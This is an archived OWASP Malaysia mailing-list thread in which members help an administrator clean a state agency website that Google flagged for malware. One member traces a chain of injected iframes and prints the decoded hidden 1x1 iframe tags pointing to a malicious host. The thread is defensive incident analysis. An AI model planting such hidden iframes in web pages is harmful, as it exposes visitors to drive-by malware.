[Owasp-Malaysia] Malware Detected!

Rasta Boy rastaboyz at gmail.com
Tue Feb 8 22:12:13 EST 2011


Thanks Adnan

On Wed, Feb 9, 2011 at 10:37 AM, Adnan bin Mohd Shukor <
adnan.shukor at gmail.com> wrote:

> Hi,
>
> For further action :)
>
> http://25yearsofprogramming.com/blog/20070705.htm
>
> Thanks
>
> On 9 February 2011 10:36, Rasta Boy <rastaboyz at gmail.com> wrote:
> > Syamsuri, nice to hear that.  Can you share your blog address.
> >
> > Adnan good work. Hope to learn more from you.
> >
> > On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <msyamsuri at gmail.com>
> wrote:
> >>
> >> Mr Adnan thanks for the info and guide..
> >>
> >> I have clean all the mess and the site is up and running again..
> >>
> >> thanks to all too..
> >>
> >> ** I will blog this so others can make it as a guide...
> >>
> >> On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor
> >> <adnan.shukor at gmail.com> wrote:
> >>>
> >>> mamp <= LOL typo.. it should be nano
> >>> js <= one of hte binary in Spidermonkey. get the patched version
> >>> http://blog.didierstevens.com/programs/spidermonkey/ and if you are
> >>> working on MacOS/Darwin, apply this patch
> >>>
> >>>
> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/
> >>>
> >>> thanks
> >>>
> >>> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan
> >>> <sharuzzaman at gmail.com> wrote:
> >>> > I can see 2 interesting apps/scripts:
> >>> >
> >>> > 1. mamp
> >>> > 2. /opt/analysis/js/js
> >>> >
> >>> > care to share? hopefully it is open source ;)
> >>> >
> >>> >
> >>> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor
> >>> > <adnan.shukor at gmail.com> wrote:
> >>> >>
> >>> >> Here is my bash history:
> >>> >>
> >>> >> xanda:tmp adnan$ history
> >>> >> <snip>
> >>> >>  500  cd /tmp
> >>> >>  501  wget http:/www2.pkink.gov.my/indexsedc.php
> >>> >>  502  wget http://www2.pkink.gov.my/indexsedc.php
> >>> >>  503  nano indexsedc.php
> >>> >>  504  wget http://www2.pkink.gov.my/indexsedc.php
> >>> >>  505  mamp indexsedc.php.1
> >>> >>  506  nano indexsedc.php.1
> >>> >>  507  wget http://www2.pkink.gov.my/sedc.php
> >>> >>  508  nano sedc.php
> >>> >>  509  wget http://www2.pkink.gov.my/default.php
> >>> >>  510  nano default.php
> >>> >>  511  nano default.php
> >>> >>  512  clear
> >>> >> <I've remove tags and leave clean JavaScript inside>
> >>> >>  513  mv default.php default.txt
> >>> >>  514  /opt/analysis/js/js < default.txt
> >>> >>  515  cat write.log
> >>> >>  516  history
> >>> >> xanda:tmp adnan$
> >>> >>
> >>> >> Below is the output of the cat:
> >>> >> [output]
> >>> >> xanda:tmp adnan$ cat write.log
> >>> >> <iframe width="1" height="1"
> >>> >>
> >>> >>
> >>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
> "></iframe>"<iframe
> >>> >> width="1" height="1"
> >>> >>
> >>> >>
> >>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
> "></iframe>"
> >>> >> [/output]
> >>> >>
> >>> >>
> >>> >> Hint: you might use modified version of spidermonkey to 'understand'
> >>> >> the javascript
> >>> >>
> >>> >> Thanks
> >>> >>
> >>> >> On 8 February 2011 17:38, Mohd Syamsuri <msyamsuri at gmail.com>
> wrote:
> >>> >> > thanks for the info..
> >>> >> > i will check all the file.
> >>> >> >
> >>> >> > how you found it?
> >>> >> >
> >>> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor
> >>> >> > <adnan.shukor at gmail.com> wrote:
> >>> >> >>
> >>> >> >> Here is the flow:
> >>> >> >>
> >>> >> >> 1) your indexsedc.php has an iframe to sedc.php
> >>> >> >> 2) and your sedc.php has an iframe to default.php
> >>> >> >> 3) and in default.php (look at the last 2 lines), javascript will
> >>> >> >> actually create an iframe to
> >>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
> >>> >> >>
> >>> >> >> thanks :)
> >>> >> >>
> >>> >> >> On 8 February 2011 17:07, Mohd Syamsuri <msyamsuri at gmail.com>
> >>> >> >> wrote:
> >>> >> >> > can you point...
> >>> >> >> > my index.htm or indexsedc.php or other file?
> >>> >> >> >
> >>> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor
> >>> >> >> > <adnan.shukor at gmail.com> wrote:
> >>> >> >> >>
> >>> >> >> >> you have iframe pointed to
> >>> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
> >>> >> >> >>
> >>> >> >> >> which is not xss :)
> >>> >> >> >>
> >>> >> >> >> >From my personal point of view, its either caused by:
> >>> >> >> >> 1) malware on pc which has been used for ftp/access to the
> >>> >> >> >> server
> >>> >> >> >> 2) compromised server
> >>> >> >> >>
> >>> >> >> >> you can send your access.log to cyber999 at cybersecurity.my or
> >>> >> >> >> mycert at mycert.org.my for further analysis :)
> >>> >> >> >>
> >>> >> >> >> thanks
> >>> >> >> >>
> >>> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <msyamsuri at gmail.com>
> >>> >> >> >> wrote:
> >>> >> >> >> > I have check it.
> >>> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy
> >>> >> >> >> > <rastaboyz at gmail.com>
> >>> >> >> >> > wrote:
> >>> >> >> >> >>
> >>> >> >> >> >> Hi Mohd Symsuri,
> >>> >> >> >> >>
> >>> >> >> >> >> Why dont you check on the reason why its being blocked, it
> >>> >> >> >> >> might
> >>> >> >> >> >> help.
> >>> >> >> >> >>
> >>> >> >> >> >>
> >>> >> >> >> >>
> >>> >> >> >> >>
> >>> >> >> >> >>
> >>> >> >> >> >>
> >>> >> >> >> >>
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
> >>> >> >> >> >>
> >>> >> >> >> >>
> >>> >> >> >> >>
> >>> >> >> >> >>
> >>> >> >> >> >>
> >>> >> >> >> >>
> >>> >> >> >> >>
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
> >>> >> >> >> >>
> >>> >> >> >> >> Regards,
> >>> >> >> >> >> Kishur
> >>> >> >> >> >>
> >>> >> >> >> >>
> >>> >> >> >> >>
> >>> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri
> >>> >> >> >> >> <msyamsuri at gmail.com>
> >>> >> >> >> >> wrote:
> >>> >> >> >> >>>
> >>> >> >> >> >>> Assalamualikum and Good day for my fellow friends.
> >>> >> >> >> >>> I need some advise.
> >>> >> >> >> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan
> >>> >> >> >> >>> (http://www.pkink.gov.my) have been blocked by Google for
> >>> >> >> >> >>> almost
> >>> >> >> >> >>> 4
> >>> >> >> >> >>> days.
> >>> >> >> >> >>> It said that we host malware on our server Malware
> Detected!
> >>> >> >> >> >>> (
> >>> >> >> >> >>> Google
> >>> >> >> >> >>> said that!!)
> >>> >> >> >> >>> What i did is..
> >>> >> >> >> >>> 1. Scan all the data and upload a new data
> >>> >> >> >> >>> 2. Check the index.html or index.php
> >>> >> >> >> >>> 3. Scan using web scanner using
> >>> >> >> >> >>> http://www.avgthreatlabs.com/
> >>> >> >> >> >>> http://www.virustotal.com
> >>> >> >> >> >>> but still get block..
> >>> >> >> >> >>> Googel said Suspected injected code
> >>> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"
> >>> >> >> >> >>> NAME="confcontent"
> >>> >> >> >> >>> scrolling=yes >
> >>> >> >> >> >>> I have using this code for almost 2 years
> >>> >> >> >> >>> What should i do now?
> >>> >> >> >> >>>
> >>> >> >> >> >>> --
> >>> >> >> >> >>> best regard
> >>> >> >> >> >>> syamsuri
> >>> >> >> >> >>>
> >>> >> >> >> >>>
> >>> >> >> >> >>>
> >>> >> >> >> >>> _______________________________________________
> >>> >> >> >> >>> Owasp-Malaysia mailing list
> >>> >> >> >> >>> Owasp-Malaysia at lists.owasp.org
> >>> >> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>> >> >> >> >>>
> >>> >> >> >> >>> OWASP Malaysia Wiki
> >>> >> >> >> >>> http://www.owasp.org/index.php/Malaysia
> >>> >> >> >> >>>
> >>> >> >> >> >>> OWASP Malaysia Wiki Facebook
> >>> >> >> >> >>>
> >>> >> >> >> >>>
> >>> >> >> >> >>>
> >>> >> >> >> >>>
> >>> >> >> >> >>>
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >>> >> >> >> >>
> >>> >> >> >> >>
> >>> >> >> >> >> _______________________________________________
> >>> >> >> >> >> Owasp-Malaysia mailing list
> >>> >> >> >> >> Owasp-Malaysia at lists.owasp.org
> >>> >> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>> >> >> >> >>
> >>> >> >> >> >> OWASP Malaysia Wiki
> >>> >> >> >> >> http://www.owasp.org/index.php/Malaysia
> >>> >> >> >> >>
> >>> >> >> >> >> OWASP Malaysia Wiki Facebook
> >>> >> >> >> >>
> >>> >> >> >> >>
> >>> >> >> >> >>
> >>> >> >> >> >>
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >>> >> >> >> >
> >>> >> >> >> >
> >>> >> >> >> >
> >>> >> >> >> > --
> >>> >> >> >> > best regard
> >>> >> >> >> > syamsuri
> >>> >> >> >> >
> >>> >> >> >> >
> >>> >> >> >> >
> >>> >> >> >> > _______________________________________________
> >>> >> >> >> > Owasp-Malaysia mailing list
> >>> >> >> >> > Owasp-Malaysia at lists.owasp.org
> >>> >> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>> >> >> >> >
> >>> >> >> >> > OWASP Malaysia Wiki
> >>> >> >> >> > http://www.owasp.org/index.php/Malaysia
> >>> >> >> >> >
> >>> >> >> >> > OWASP Malaysia Wiki Facebook
> >>> >> >> >> >
> >>> >> >> >> >
> >>> >> >> >> >
> >>> >> >> >> >
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >>> >> >> >> >
> >>> >> >> >> _______________________________________________
> >>> >> >> >> Owasp-Malaysia mailing list
> >>> >> >> >> Owasp-Malaysia at lists.owasp.org
> >>> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>> >> >> >>
> >>> >> >> >> OWASP Malaysia Wiki
> >>> >> >> >> http://www.owasp.org/index.php/Malaysia
> >>> >> >> >>
> >>> >> >> >> OWASP Malaysia Wiki Facebook
> >>> >> >> >>
> >>> >> >> >>
> >>> >> >> >>
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >>> >> >> >
> >>> >> >> >
> >>> >> >> >
> >>> >> >> > --
> >>> >> >> > best regard
> >>> >> >> > syamsuri
> >>> >> >> >
> >>> >> >> >
> >>> >> >> >
> >>> >> >> > _______________________________________________
> >>> >> >> > Owasp-Malaysia mailing list
> >>> >> >> > Owasp-Malaysia at lists.owasp.org
> >>> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>> >> >> >
> >>> >> >> > OWASP Malaysia Wiki
> >>> >> >> > http://www.owasp.org/index.php/Malaysia
> >>> >> >> >
> >>> >> >> > OWASP Malaysia Wiki Facebook
> >>> >> >> >
> >>> >> >> >
> >>> >> >> >
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >>> >> >> >
> >>> >> >> _______________________________________________
> >>> >> >> Owasp-Malaysia mailing list
> >>> >> >> Owasp-Malaysia at lists.owasp.org
> >>> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>> >> >>
> >>> >> >> OWASP Malaysia Wiki
> >>> >> >> http://www.owasp.org/index.php/Malaysia
> >>> >> >>
> >>> >> >> OWASP Malaysia Wiki Facebook
> >>> >> >>
> >>> >> >>
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >>> >> >
> >>> >> >
> >>> >> >
> >>> >> > --
> >>> >> > best regard
> >>> >> > syamsuri
> >>> >> >
> >>> >> >
> >>> >> >
> >>> >> > _______________________________________________
> >>> >> > Owasp-Malaysia mailing list
> >>> >> > Owasp-Malaysia at lists.owasp.org
> >>> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>> >> >
> >>> >> > OWASP Malaysia Wiki
> >>> >> > http://www.owasp.org/index.php/Malaysia
> >>> >> >
> >>> >> > OWASP Malaysia Wiki Facebook
> >>> >> >
> >>> >> >
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >>> >> >
> >>> >> _______________________________________________
> >>> >> Owasp-Malaysia mailing list
> >>> >> Owasp-Malaysia at lists.owasp.org
> >>> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>> >>
> >>> >> OWASP Malaysia Wiki
> >>> >> http://www.owasp.org/index.php/Malaysia
> >>> >>
> >>> >> OWASP Malaysia Wiki Facebook
> >>> >>
> >>> >>
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >>> >
> >>> >
> >>> >
> >>> > --
> >>> > Sharuzzaman Ahmat Raslan
> >>> >
> >>> > _______________________________________________
> >>> > Owasp-Malaysia mailing list
> >>> > Owasp-Malaysia at lists.owasp.org
> >>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>> >
> >>> > OWASP Malaysia Wiki
> >>> > http://www.owasp.org/index.php/Malaysia
> >>> >
> >>> > OWASP Malaysia Wiki Facebook
> >>> >
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >>> >
> >>> _______________________________________________
> >>> Owasp-Malaysia mailing list
> >>> Owasp-Malaysia at lists.owasp.org
> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>>
> >>> OWASP Malaysia Wiki
> >>> http://www.owasp.org/index.php/Malaysia
> >>>
> >>> OWASP Malaysia Wiki Facebook
> >>>
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >>
> >>
> >>
> >> --
> >> best regard
> >> syamsuri
> >>
> >>
> >>
> >> _______________________________________________
> >> Owasp-Malaysia mailing list
> >> Owasp-Malaysia at lists.owasp.org
> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>
> >> OWASP Malaysia Wiki
> >> http://www.owasp.org/index.php/Malaysia
> >>
> >> OWASP Malaysia Wiki Facebook
> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >
> >
> > _______________________________________________
> > Owasp-Malaysia mailing list
> > Owasp-Malaysia at lists.owasp.org
> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >
> > OWASP Malaysia Wiki
> > http://www.owasp.org/index.php/Malaysia
> >
> > OWASP Malaysia Wiki Facebook
> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >
> _______________________________________________
> Owasp-Malaysia mailing list
> Owasp-Malaysia at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>
> OWASP Malaysia Wiki
> http://www.owasp.org/index.php/Malaysia
>
> OWASP Malaysia Wiki Facebook
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-malaysia/attachments/20110209/cd42bb31/attachment-0001.html 


More information about the Owasp-Malaysia mailing list